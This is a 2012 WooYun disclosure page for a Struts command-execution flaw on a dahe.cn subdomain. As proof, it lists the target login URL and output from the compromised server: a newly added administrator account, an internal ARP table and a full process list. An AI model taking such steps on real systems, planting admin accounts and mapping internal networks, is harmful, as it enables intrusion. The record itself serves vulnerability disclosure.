当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2012-010247
漏洞标题:
大河网分站命令执行
相关厂商:
大河网
漏洞作者:
zhk
提交时间:
2012-07-28 02:16
修复时间:
2012-09-11 02:17
公开时间:
2012-09-11 02:17
漏洞类型:
系统/服务补丁不及时
危害等级:
自评Rank:
16
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2012-07-28: 细节已通知厂商并且等待厂商处理中
2012-07-31: 厂商已经确认,细节仅向厂商公开
2012-08-10: 细节向核心白帽子及相关领域专家公开
2012-08-20: 细节向普通白帽子公开
2012-08-30: 细节向实习白帽子公开
2012-09-11: 细节向公众公开

简要描述:

大河网struts命令执行

详细说明:

大河网struts命令执行
http://jdwt.dahe.cn/
http://jdwt.dahe.cn/focus/admin/login.do

漏洞证明:

成功添加管理员zhktest

\\SVCTAG-5DC7Q2X ?????
-------------------------------------------------------------------------------
Administrator            Guest                    SUPPORT_388945a0         
zhktest


Interface: 192.168.1.174 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.1.10          00-1c-54-23-18-8a     dynamic   
  192.168.1.95          00-1e-c9-ea-a0-0f     dynamic   
  192.168.1.151         00-23-ae-ec-a8-7c     dynamic   
  192.168.1.157         00-26-b9-fb-2c-e4     dynamic   
  192.168.1.158         00-26-b9-fb-2d-90     dynamic   
  192.168.1.163         00-26-b9-fa-e0-30     dynamic   
  192.168.1.173         00-23-ae-fd-ae-48     dynamic   
  192.168.1.176         00-23-ae-fd-af-a0     dynamic   
  192.168.1.177         00-23-ae-fd-6d-24     dynamic   
  192.168.1.239         00-0d-56-b9-66-ca     dynamic

????                       PID ???              ??#       ???? 
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        476 K
smss.exe                       312 Console                    0        524 K
csrss.exe                      360 Console                    0      2,776 K
winlogon.exe                   384 Console                    0      3,888 K
services.exe                   432 Console                    0      4,012 K
lsass.exe                      444 Console                    0     10,888 K
svchost.exe                    652 Console                    0      3,184 K
svchost.exe                    716 Console                    0      3,892 K
svchost.exe                    788 Console                    0      5,316 K
svchost.exe                    824 Console                    0      7,588 K
svchost.exe                    840 Console                    0     22,508 K
spoolsv.exe                    968 Console                    0      5,732 K
msdtc.exe                     1164 Console                    0      4,700 K
svchost.exe                   1284 Console                    0      2,572 K
NTRtScan.exe                  1328 Console                    0      5,896 K
svchost.exe                   1376 Console                    0      2,032 K
ConfigCenter.exe              1404 Console                    0      6,404 K
HttpSvr.exe                   1456 Console                    0     10,100 K
rtxsvrmain.exe                1720 Console                    0      6,808 K
r_server.exe                  1784 Console                    0      5,624 K
snmp.exe                      1824 Console                    0      5,156 K
TmListen.exe                  1900 Console                    0      5,264 K
HttpSvr.exe                   2096 Console                    0      9,984 K
CNTAoSMgr.exe                 2488 Console                    0      2,856 K
LicenseServer.exe             2540 Console                    0      9,704 K
DBServer.exe                  2584 Console                    0     12,484 K
GroupServer.exe               2636 Console                    0      6,968 K
ConnServer.exe                3044 Console                    0     28,136 K
AppServer.exe                 3056 Console                    0     15,040 K
SDKServer.exe                 3168 Console                    0     10,852 K
SessionServer.exe             3740 Console                    0      5,964 K
InfoServer.exe                4112 Console                    0      7,736 K
FileServer.exe                4212 Console                    0     21,896 K
UpgradeSvr.exe                4324 Console                    0     24,768 K
GW.exe                        4464 Console                    0      5,676 K
AppManager.exe                4536 Console                    0      8,664 K
DisGroupServer.exe            4548 Console                    0      9,912 K
AppDllHost.exe                4848 Console                    0      6,104 K
AppDllHost.exe                4860 Console                    0     51,248 K
AppDllHost.exe                4940 Console                    0      9,852 K
AppDllHost.exe                4948 Console                    0     31,364 K
RCAServer.exe                 4964 Console                    0     15,944 K
RCAProxyFileServer.exe        5204 Console                    0     25,576 K
svchost.exe                   5536 Console                    0      5,088 K
wmiprvse.exe                  2064 Console                    0      5,692 K
explorer.exe                  1980 Console                    0     17,508 K
MtxHotPlugService.exe         7000 Console                    0      1,396 K
PccNTMon.exe                  7012 Console                    0      4,412 K
ctfmon.exe                    7004 Console                    0      3,640 K
conime.exe                    7032 Console                    0      2,664 K
ADSms.exe                     7060 Console                    0      9,228 K
mysqld.exe                    7504 Console                    0     10,284 K
baidu.exe                     7748 Console                    0     26,268 K
java.exe                      6296 Console                    0    581,620 K
logon.scr                     5520 Console                    0      2,004 K
wmiprvse.exe                  4972 Console                    0      6,164 K
tasklist.exe                  6892 Console                    0      4,252 K

修复方案:

打补丁

版权声明:转载请注明来源 zhk@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-07-31 08:03

厂商回复:

非常感谢

最新状态:

暂无